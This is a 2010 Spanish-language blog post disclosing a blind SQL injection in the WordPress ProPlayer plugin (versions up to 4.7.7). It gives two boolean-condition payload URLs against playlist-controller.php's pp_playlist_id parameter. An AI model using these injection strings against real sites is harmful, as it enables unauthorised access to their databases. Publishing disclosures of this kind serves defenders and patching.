viernes, 10 de diciembre de 2010

WP-Proplayer Plugin Blind SQL Inyection

<-------

WP-ProPlayer Plugin Blind SQL Inyection
By Ca0s `

Visit:
        st4ck-3rr0r.blogspot.com
        ka0-labs.org
    Shouts @
        evilzone.org
        elhacker.net
        diosdelared.com

------->
<-------

Software: ProPlayer <= 4.7.7
URL:
 http://wordpress.org/extend/plugins/proplayer/
 http://isagoksu.com/proplayer-wordpress-plugin/
Vuln: Blind SQL Inyection ->
 /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
 /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

Detail: some servers filter ' to %27, so doesn't work this way.
------->
Publicado por Ca0s en 12/10/2010 10:30:00 p. m. 1 comentarios
Etiquetas:
Suscribirse a: Entradas (Atom)